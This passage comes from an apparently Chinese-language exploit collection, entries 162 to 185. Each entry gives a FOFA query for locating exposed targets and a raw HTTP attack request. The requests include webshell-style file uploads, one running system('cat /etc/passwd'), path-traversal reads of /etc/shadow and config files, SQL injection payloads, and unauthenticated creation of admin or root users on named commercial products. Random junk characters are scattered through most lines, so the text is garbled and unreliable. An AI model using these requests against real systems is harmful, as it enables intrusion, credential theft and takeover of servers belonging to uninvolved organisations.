?( l3 q1 n# t$ I<fileName>../../../../dizxdell.aspx</fileName>$ R) Z/ E: l% \0 W
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>& X% n. x' o' L+ D
<tag>3</tag>/ [4 F& r2 @2 ?' h
</UploadResume> J% N- `! R$ [9 w# U" L
</soap:Body> q+ ]* M: v& B, |( y
</soap:Envelope>9 g1 R+ r) O p- X* O) m' ]# \
6 r) {3 O9 N' U' U. A8 i
- `" a# Y4 P) R8 H7 Z8 H% B, x b) |http://x.x.x.x/dizxdell.aspx
4 y4 [; x: F& Q1 C
@# j4 u* a1 N0 o, T6 U162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
( @3 X, N+ t/ b" p+ z/ G% @) pFOFA: app="和丰山海-数字标牌"- r( [0 r8 P: B: L3 {% G
POST /QH.aspx HTTP/1.1
5 J/ ^5 ~2 d, x1 X3 g% _Host: x.x.x.x6 y2 V j3 Y7 f6 n0 g+ _0 T: l! I8 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 W( p" J! m( _" \
Connection: close
) s* t1 T5 [$ ]7 p$ k! JContent-Length: 5838 R' \1 h- x, H; m4 p. Y5 |& a9 o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey8 ]. y I, S1 O, f
Accept-Encoding: gzip
T( l; G7 F& x
% ^# U' n0 ~0 G, [+ h& g% c3 X& x------WebKitFormBoundaryeegvclmyurlotuey
1 l3 ]& e/ y R* BContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
( o' X e9 S/ n4 y# PContent-Type: application/octet-stream3 C2 n u& O2 j1 D
- m( ]3 c0 v" m% K: U
<% response.write("ujidwqfuuqjalgkvrpqy") %>
' {7 K v: K" u9 u9 H- y------WebKitFormBoundaryeegvclmyurlotuey
! [! |" E7 H* t. NContent-Disposition: form-data; name="action"0 v# b9 F7 x8 O; p; T+ y# _; c; K
1 N* D6 N4 W) y( [
upload
# R- ]$ |% K# y' j( w2 i4 ~7 `; J------WebKitFormBoundaryeegvclmyurlotuey
2 G) q, t* g) D0 _Content-Disposition: form-data; name="responderId": ^8 S& ] n5 @# y/ k- j
/ }" _+ W7 w( l% X3 ^. o4 {8 y
ResourceNewResponder Z. S* [1 M' h1 P2 b( W
------WebKitFormBoundaryeegvclmyurlotuey
, b4 k& O+ u5 C& l: }5 v, RContent-Disposition: form-data; name="remotePath"; Q! P9 I- x/ h9 R
. h, A9 u+ u% R1 p: M, M: K9 Y; |/opt/resources
- E) |9 R) }( {, R------WebKitFormBoundaryeegvclmyurlotuey--
( {/ X) t0 n( Z# ] h7 d' O! s& p$ d6 T; ^: I; l7 T5 \# R- t. o# U
2 [0 D4 u3 r+ L2 L( T
http://x.x.x.x/opt/resources/kjuhitjgk.aspx, U9 F, f9 h `# S, z
3 P3 _, i. l, S% o163. 号卡极团分销管理系统 ue_serve.php 任意文件上传' y9 ^* H: ^( B4 P* z
FOFA: icon_hash="-795291075"
: p& r- Q5 [" x. N3 @$ |) J; oPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
# F3 e0 ?; j+ x6 D4 k& mHost: x.x.x.x) G9 X( T1 z! a! L! {) @: E% p d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.369 O' F/ F& f5 H' l( ?! j/ }; c
Connection: close
- Z5 p) q+ x: h9 ?6 I+ D( m- YContent-Length: 293) }4 f5 M# S7 o z5 m3 ?; c
Accept: */*4 o J& ~# j, W$ w4 h; p
Accept-Encoding: gzip, deflate9 | p$ v$ ^" H7 R! ^
Accept-Language: zh-CN,zh;q=0.9
$ r3 r$ g: s$ O* x# WContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
- n7 b+ W* g5 B! N- ^
A! x# |1 u/ \! a! O" V------iiqvnofupvhdyrcoqyuujyetjvqgocod& a, B0 s" F$ x% @
Content-Disposition: form-data; name="name"6 X, b6 [4 D& `
% R1 f" a7 n0 K% j7 P4 f1.php3 |0 Z' j: ?' R9 E$ f
------iiqvnofupvhdyrcoqyuujyetjvqgocod c4 f3 ?5 D o* W" T
Content-Disposition: form-data; name="upfile"; filename="1.php"
- S# V9 Z- ?) Z6 N1 RContent-Type: image/jpeg3 `: @, T+ R3 I1 R/ G
* J' O: B6 J1 h$ R3 P+ i I5 M3 |rvjhvbhwwuooyiioxega1 G' S! T1 q ^
------iiqvnofupvhdyrcoqyuujyetjvqgocod--5 c& L% O k! c- Z- I
7 r7 D5 x* h0 ?3 e. c' Y; y4 g1 M
- g6 D$ F( P1 j i/ G( E
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
5 ^/ ]9 y i2 G$ S7 m' U7 Q2 @& @" OFOFA: title="智慧综合管理平台登入"
5 S/ }$ d% v- `: s% ZPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1% N1 N5 E" N# A5 j7 U8 x
Host: x.x.x.x8 E# o) I8 D& G3 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
$ ]9 y/ a) k g9 ~5 f" b1 ZContent-Length: 288
3 t7 f3 | M( Z& l! v9 AAccept: application/json, text/javascript, */*; q=0.01
" I9 ? l+ a, N, l2 ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
: ^: [2 x$ @& _6 X/ vConnection: close+ l( {- i% S: Y0 ~; i
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
9 Z' e# [) y7 |" \X-Requested-With: XMLHttpRequest) g" k9 E- W$ ^8 {1 _, X9 m6 X7 Z
Accept-Encoding: gzip- m8 _+ B7 h3 w% o7 `: y. X
) G, h7 M; `+ D5 |/ Y: N
------dqdaieopnozbkapjacdbdthlvtlyl0 v% ^: Z5 T% [1 S, _
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
$ g$ P, J r, g$ GContent-Type: image/jpeg' B3 `& j; J7 U! J& Z( r( N
( K/ o/ r- K) s) ]0 R6 D+ f# N/ J<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>( H. }7 | A( q! `$ l5 s8 E
------dqdaieopnozbkapjacdbdthlvtlyl--
. l; e$ l0 h) K4 C- H" b! [- V+ f% `7 U6 r
7 _# L: w7 |( I6 p$ j$ V6 ihttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
9 q7 j ?, B( l- t/ t+ j7 i- j. f& U" ]& f+ y0 e
165. OrangeHRM 3.3.3 SQL 注入
8 H, M) {8 i* F: K+ t) l& U* N) C8 m' r' ZCVE-2024-36428. H1 ] x5 t; [3 E1 M! S) v
FOFA: app="OrangeHRM-产品"
$ c3 d+ `4 F6 H2 j" B0 oURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
) @2 G" ]3 E; U% T$ i1 }5 d& N. K$ l1 {% u
% m9 ^8 k! k( i" f9 @4 b- k. }
166. 中成科信票务管理平台SeatMapHandler SQL注入6 f! d* J6 M2 A
FOFA:body="技术支持:北京中成科信科技发展有限公司": w& w: x9 H& Q6 a$ [- t# o. f
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1: C; K. ]/ F! q. {. h7 s. _
Host:
( ?( a; {5 H7 @, d, _Pragma: no-cache
4 ^! h0 M' o1 y, ~$ Y9 n$ H+ vCache-Control: no-cache' {7 P3 ? F# l3 J' p9 e- D" q
Upgrade-Insecure-Requests: 19 M/ ]3 p+ o. A" k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36% O) W2 Y. d- q. p7 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; T! n$ I2 G3 A8 l# J
Accept-Encoding: gzip, deflate' I! y" [" M# O) X
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
) t+ a( Y. P9 V+ D' _1 S# UCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
1 @9 `" M+ ?9 NConnection: close0 o, u) @) b' Y- F, Y- b3 V
Content-Type: application/x-www-form-urlencoded
( D Z& U: O2 `2 k( A/ j/ T7 WContent-Length: 89
4 Q: F+ ]6 @; }: g$ Z' G( ^
$ h, J7 w: T; |7 P, C3 lMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE4 [2 x2 E# }" V4 i, c# ]- M; F
& u- _5 _& X! ?7 P& U5 W
- b: [* i4 Z1 o1 y3 o& {5 v* @8 m
167. 精益价值管理系统 DownLoad.aspx任意文件读取
?. P0 F3 B( P, z3 A5 cFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
# o1 N8 d9 j% pGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
4 T2 {& w1 L8 W0 l* K3 _Host:
6 g9 H+ \- v( k* _. Z# m( }! eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* A1 u% w1 e) G/ NContent-Type: application/x-www-form-urlencoded. h7 S9 D( q4 f; ]* D3 K: U$ z0 P
Accept-Encoding: gzip, deflate, F+ i7 ~1 O0 k# O7 x' _4 @
Accept: */*3 x' R! U' f( g. G1 r, L5 s
Connection: keep-alive3 ?0 F1 F, ]/ l
5 }; r4 d! h6 u$ j
6 K& p7 D0 f# J" s4 A; \168. 宏景EHR OutputCode 任意文件读取: Y8 C+ M+ o8 e& }5 D
FOFA:app="HJSOFT-HCM"# r- z5 I' P# x' M9 a) q" m1 x
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
; c1 P) b* x$ g2 S$ a- sHost: your-ip/ b9 ^7 [" W& ]0 l9 p/ X1 S/ ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36: s+ {: A$ t$ J- `
Content-Type: application/x-www-form-urlencoded# e' `* g( m, C& P
Connection: close8 N# v% q! ^, Q& m+ c7 \1 k
E, W2 R8 b: \# a. E* [
4 @ i7 t3 L" V, q. v% G. E
$ w8 l2 n% w" M. p- `9 A
169. 宏景EHR downlawbase SQL注入) ~3 |6 A* y3 z9 Y
FOFA:app="HJSOFT-HCM"8 f. X/ k6 L$ `/ {6 o2 W0 s: q
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
; k) G' l( d6 r3 q g- l5 hHost: your-ip
* \3 u6 U5 O! S- l# h* dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 {% M, h8 Z8 K# Y6 Y! q
Accept: */*4 G! E" {9 q* F4 i9 Y
Accept-Encoding: gzip, deflate
9 f& n+ C* r/ n" W0 p5 C5 DConnection: close
1 N% H" n! W( ^0 p* C& I! V
7 I: h$ f" F C6 y0 a* {# o: T
( d& y5 Z) L& T& z" P+ S( h ]
2 a0 n9 u8 C" ?8 P- w" b170. 宏景EHR DisplayExcelCustomReport 任意文件读取; w9 O: A2 _1 Q" K
FOFA:body="/general/sys/hjaxmanage.js"2 `# k4 y9 E" W2 ?' F- P2 \
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1* L B v$ H- h3 I3 x1 T% U' G
Host: balalanengliang ~4 ]) u( ?% Y7 A5 L8 Y& Y1 x$ ]
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, I3 n( i. D" Q0 {) g8 yContent-Type: application/x-www-form-urlencoded
. K1 A% \, a n1 C8 {. A9 H
* c4 N0 c' ]% efilename=../webapps/ROOT/WEB-INF/web.xml+ h- Z1 @7 Y* a9 x
& d/ R, N1 L, X4 v7 u0 w
1 ~: c, v& g2 V3 @171. 通天星CMSV6车载定位监控平台 SQL注入6 E! d1 t& {' k3 H5 ~
FOFA:body="/808gps/" s7 @( D/ I: V, y7 G6 z/ ^
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
3 Q* s6 l+ W8 ^1 |3 lHost: your-ip
, M* @ ^: m" V0 F& ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0/ ?2 z4 y* f0 {
Accept: */*
6 B" W. O; I$ Z) u9 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& |% U) y/ \7 p, E4 j, p( v' i
Accept-Encoding: gzip, deflate
- S! g8 @+ b8 c3 |, Z) L5 uConnection: close
! \+ n u+ h: @& _
7 }7 N4 Y5 a! r( Z Z* T& f
# M- z; G+ R- ?4 u" w# L8 o! J4 ^, t- ?0 b y$ Y8 P7 I+ L
172. DT-高清车牌识别摄像机任意文件读取
a9 ~* w, d* |: jFOFA:app="DT-高清车牌识别摄像机"
1 M% w( i+ w/ e0 p+ X* @) I: _GET /../../../../etc/passwd HTTP/1.1
- Z! A: X( q. Z* q+ aHost: your-ip
6 Q8 _* a2 K: u; Z' kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 E( Z- @4 b' i) AAccept-Encoding: gzip, deflate+ r7 v0 f( Q, B4 R M" i, Q
Accept: */*
0 C6 y' E5 O8 T( l) \Connection: keep-alive4 J: n/ R5 f# x5 T0 Q
* F; @9 {4 g# h6 N9 e$ E- h
|2 Z1 `/ L& m3 o
* r/ f8 @7 \4 T4 b) T$ }+ H173. Check Point 安全网关任意文件读取
w+ g8 Z0 I, Y# F2 bCVE-2024-24919
5 R2 K" L( v2 G; ]9 B& m9 l- [FOFA:app="Check_Point-SSL-Network-Extender"
$ {( l! Q$ ^) B6 |$ cPOST /clients/MyCRL HTTP/1.1
/ V/ l A& N3 G8 e2 Y5 GHost: your-ip
& h# }, l; k$ T0 OContent-Type: application/x-www-form-urlencoded8 A# z6 x: ?0 G( I
/ f9 |! u& K1 d, k& gaCSHELL/../../../../../../../etc/shadow
4 M3 x8 _+ R( j1 \! u+ @9 g% o8 y/ \1 J& r7 @- W
8 U) L; q' ~- U5 E2 c' n n9 \
6 S' _+ W$ C: B% a174. 金和OA C6 FileDownLoad.aspx 任意文件读取
( H" T2 S9 p' cFOFA:app="金和网络-金和OA"
' r4 ]3 N; j8 p! u8 _GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
8 W5 {& X C3 m! y2 gHost: your-ip& ]6 j, h4 Z/ w- w. V' @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) x" B% |+ @& J) R' L! mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" J5 t- v$ Q4 c! b& m. A/ CAccept-Encoding: gzip, deflate, br+ d# P! g% p6 W- u
Accept-Language: zh-CN,zh;q=0.92 s' V2 s7 u( z; L1 N, g) Z( z/ _
Connection: close$ C+ Q( U2 ~6 }+ ? X0 x# w2 H
: t4 m% ?9 {; G, H, r! w
% g$ b* g; O0 N% [+ s- U: k2 m, i8 N$ E0 w, l, b
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入' {- ]6 z! @2 R% j2 R& x
FOFA:app="金和网络-金和OA"9 N3 p- e' a- C6 g3 w
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.10 J) \% I; B" G( h# L: A
Host:
; V* e' L. i+ B' AUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 H. W; `7 P2 t$ g! b, B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ `, I$ l. R! n: x5 J! q2 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 J5 {* w i1 g' lAccept-Encoding: gzip, deflate
5 u2 ^7 ^7 m# k8 }Connection: close& K) l$ x1 b a# [
Upgrade-Insecure-Requests: 17 ?& D3 f/ T- S
! `& V- N5 U# r' m" z# [
: \8 _7 l( i. f3 ?7 S7 \8 v9 U176. 电信网关配置管理系统 rewrite.php 文件上传
) I9 s$ B& @- W8 x$ y% aFOFA:body="img/login_bg3.png" && body="系统登录"
+ z- |9 ?( w8 S) E6 X% A3 Z; w7 jPOST /manager/teletext/material/rewrite.php HTTP/1.1
2 @; a- F+ E$ g: A& m9 b% `" N' iHost: your-ip
# O. _( q# m9 r$ y5 R7 b- W9 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0, F6 `. p; M$ g" {2 R# J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
0 f3 l+ E% p0 V( g2 v* q l. }Connection: close5 x7 |! J5 t6 H
& l( {% U/ J3 }) J4 X; w------WebKitFormBoundaryOKldnDPT3 W3 `) g4 c" {
Content-Disposition: form-data; name="tmp_name"; filename="test.php"* G1 n6 F% O2 _# u
Content-Type: image/png
7 u3 W& M. N y% L5 `- U! A: ?
- @3 s6 _! c3 S<?php system("cat /etc/passwd");unlink(__FILE__);?>
- u7 D% Q- C1 Z' R" |) M5 i. G. Z------WebKitFormBoundaryOKldnDPT+ @% o0 [2 U' u" S( W! A4 t$ x
Content-Disposition: form-data; name="uploadtime"0 q6 H8 c0 }2 Q/ ~! c, Y
z9 j7 w5 t! d7 R1 ?" g7 L- w
" \! l' C$ s+ c) ^8 R% L$ x------WebKitFormBoundaryOKldnDPT--
0 B& q6 J5 T+ J
& e2 C( v$ p8 G1 e# r$ H7 y8 N! i5 a; P# q1 _7 [
. V' Y$ f; p: n% U/ ]177. H3C路由器敏感信息泄露
, _ q8 x7 Y/ i; K. ]( m; e, a8 M/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/ C. M6 [* L$ n; e/userLogin.asp/../actionpolicy_status/../M60.cfg
) D. y2 h8 `9 l( x- f+ m( _/userLogin.asp/../actionpolicy_status/../GR8300.cfg+ P% J( }( b' m0 {7 `
/userLogin.asp/../actionpolicy_status/../GR5200.cfg; y! c& t# n" E) @5 O; g, ^
/userLogin.asp/../actionpolicy_status/../GR3200.cfg- y E# H; q) l5 ^
/userLogin.asp/../actionpolicy_status/../GR2200.cfg9 s$ x; a, y' r3 q; }8 u. {- ^
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
0 R, k# W3 Q: Y, `6 j L/ i$ ?- i/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
5 C* T: U! \/ n/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
3 z( D/ G8 h7 f: P5 i/ G/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg! s4 v( R2 @( u3 h
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
. C, s! m; k+ o/userLogin.asp/../actionpolicy_status/../ER5100.cfg
7 v+ H( Z7 Y! e6 N0 Y% `/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg2 x, E/ C' s9 G! K
/userLogin.asp/../actionpolicy_status/../ER3260.cfg! p# [1 H3 p5 f; O. [4 V0 g+ h
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
7 f7 {: Q1 T+ `4 [# R/userLogin.asp/../actionpolicy_status/../ER3200.cfg1 q: i+ w @6 L# H+ V
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg1 F k, p1 W, G* i$ Q5 ^
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg! Y! c7 ~) j9 E6 h9 C$ v: e# o; @
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
6 s* L/ U' H0 V2 g- X8 ?! N/userLogin.asp/../actionpolicy_status/../ER3100.cfg; t- B0 a; E* K* v: J: R
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg, ~) |- b! D2 Z. a2 S/ l
, d, q2 i; h7 b. r, J/ Q s8 O
, @3 G; s: v- g. u! q( v9 v178. H3C校园网自助服务系统-flexfileupload-任意文件上传6 K5 X: ~# ]" _$ Z
FOFA:header="/selfservice", @6 u% J. y1 h: k) r6 F0 |
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1" o& b, P7 i0 ]- k$ T2 p
Host:
; S: n/ I" h5 n. ^5 c( qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( |$ D1 m" g* kContent-Length: 252
% X: T+ j- G( `9 LAccept-Encoding: gzip, deflate
8 ~% ~/ f2 [. G9 r+ n' VConnection: close
W$ ?5 V3 Z6 q: WContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l3 C& v- s) Y. K9 c9 W2 v# W
-----------------aqutkea7vvanpqy3rh2l4 Q" Q+ A3 D- A
Content-Disposition: form-data; name="12234.txt"; filename="12234"4 F5 o' A4 A% G1 r5 s
Content-Type: application/octet-stream
) }0 \6 A. `$ M1 S2 O% w) u1 tContent-Length: 2556 j! t# \( ~0 s4 e% d/ F6 M1 ~. g
8 E |4 ]. z3 i4 q4 |12234
; z' T) f' ?9 T: x; T-----------------aqutkea7vvanpqy3rh2l--- V+ q; D( \( A$ r+ z6 O
* D5 L/ r/ ~" \( p
3 }8 ?) L6 i, n/ x# }4 tGET /imc/primepush/%2e%2e/flex/12234.txt
1 Z1 C9 y: \5 |) F3 K$ O
7 j/ ~6 Y# Z4 C4 B+ d( p. T& U! h2 }) I( N- p
179. 建文工程管理系统存在任意文件读取& u! x. p" A& S
POST /Common/DownLoad2.aspx HTTP/1.1$ \% Q0 I6 |: I5 X/ g0 b8 b1 D
Host: {{Hostname}}3 S( [5 s# ], i5 q# X
Content-Type: application/x-www-form-urlencoded
8 W4 u. I& E! n$ B) ?User-Agent: Mozilla/5.0
( e" w0 U; x: \, ~# O( J
: X @4 w- e/ s6 M+ epath=../log4net.config&Name=
# O( b, Q x5 z+ L% A7 @
, {" U4 ]/ v& u. J
: x& V$ a) Z) Y) L" C180. 帮管客 CRM jiliyu SQL注入5 T; z/ W" M5 e+ z A
FOFA:app="帮管客-CRM"
) z& C0 B2 K2 i" r& r% h5 mGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.12 |" O" f# a- w5 P r7 X
Host: your-ip
) j8 e6 B+ T1 y7 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, f) g6 J5 X3 T3 r3 F4 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, _* _* W+ |2 I- v) X" dAccept-Encoding: gzip, deflate% L0 j {' Y3 P( J" v: b
Accept-Language: zh-CN,zh;q=0.9
1 i5 K. o8 `1 j. W. FConnection: close
2 g! Z; i3 x$ u( _5 K: ?
* N2 I) |9 [' B9 G* K8 B. q1 \( ^8 i5 k7 p# G3 W0 Q \' n% F
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
. a A4 ]6 C! E! IFOFA:"PDCA/js/_publicCom.js"+ E* e9 J' S/ a- r
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
f- ]: M2 c, k& P6 z* ^Host: your-ip" R7 @* D; L% o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
; C+ O1 p3 |( j0 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( j5 L% J% p3 T" ?% H+ v% hAccept-Encoding: gzip, deflate, br; b" J T$ ^3 m) G+ \8 g
Accept-Language: zh-CN,zh;q=0.9/ Y4 _/ ^ K1 z
Connection: close
2 r3 |4 Z) k- q) i4 @Content-Type: application/x-www-form-urlencoded
) @. }4 N+ K, q9 [8 V& ^7 ?. o2 V$ C" |! [. M3 d/ r1 W# `
) _$ G& h/ }" Z0 W
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
1 m% m% m) q F7 Q! }+ o& W9 V) B$ I
( B4 O/ p/ E2 p7 v$ [- n3 M# l- p: P/ k0 [ o
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建7 L( H( i0 A1 ]6 i9 I& L
FOFA:"PDCA/js/_publicCom.js" m" I/ w! ?7 K: T
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
0 ^7 l: `- t& g4 L- `Host: your-ip
9 f! o/ f" z) w) Y$ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.366 z5 v5 `1 D7 |* Z/ |5 ^3 {8 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 D+ Y, C$ u, p# B2 v# j! gAccept-Encoding: gzip, deflate, br& {9 I6 s! K2 ]" Q
Accept-Language: zh-CN,zh;q=0.9- m9 l- |0 f1 P$ R* C3 d4 g
Connection: close
; f8 f/ D3 i: V9 HContent-Type: application/x-www-form-urlencoded2 N! u1 Y: N$ ~1 _3 p6 f% n7 `
# N7 `) K' @) z, `4 O- Q
% o, l. Y" n& d3 tusername=test1234&pwd=test1234&savedays=1
* [) w3 M% i! T* K* ~0 x6 O* e! D: d, v
+ V$ `, S& i' H: l
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
, _, D- d# r1 l/ l: r9 |) F' _FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"" c/ M* }$ [4 t
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
/ r' R% k I5 z) Y' O- mHost: your-ip
" ]9 q3 U5 s& N- g/ s% MUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
1 H* H( B& d9 zAccept-Charset: utf-80 C8 d# p' l0 `4 O' r
Accept-Encoding: gzip, deflate
$ [" q8 g' Y1 i& x7 w/ g1 h' zConnection: close+ [# M) R! V1 @4 W, G
& p5 w5 F1 ]! W V$ {; q! A0 G
& x! e) G& |' K* N0 [/ B% ` T
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加6 k4 \ ]# @: ^( n6 g' u
FOFA:server="SunFull-Webs"
& L9 {$ [' g$ `) t& iPOST /soap/AddUser HTTP/1.1
6 R# P( |9 V, R7 tHost: your-ip
9 N( X3 M& t u pAccept-Encoding: gzip, deflate
. U5 ~% }8 c* j) n& o4 s EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.03 g5 b8 x7 y1 G7 S9 T" [4 ^6 ~
Accept: application/xml, text/xml, */*; q=0.01
- B$ {! q. `" T4 @. aContent-Type: text/xml; charset=utf-8' O _5 f% r9 E1 M) J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 [! ^. ?" j* j
X-Requested-With: XMLHttpRequest
2 Y) u8 a9 _) t/ O, w, _. j. Q- n0 e1 w1 S: U& l7 i
/ t p4 O* Y' _/ ]6 z, ^' }( Cinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
; f+ \1 G4 L. ~
. m, G. u$ L, p6 Y
# _* L' d4 e9 l- C) Z \185. 瑞友天翼应用虚拟化系统SQL注入7 N/ _2 ~6 H. U/ G) E; R5 g( {
version < 7.0.5.12 U) R1 c4 k" w' L! D/ b
FOFA:app="REALOR-天翼应用虚拟化系统"
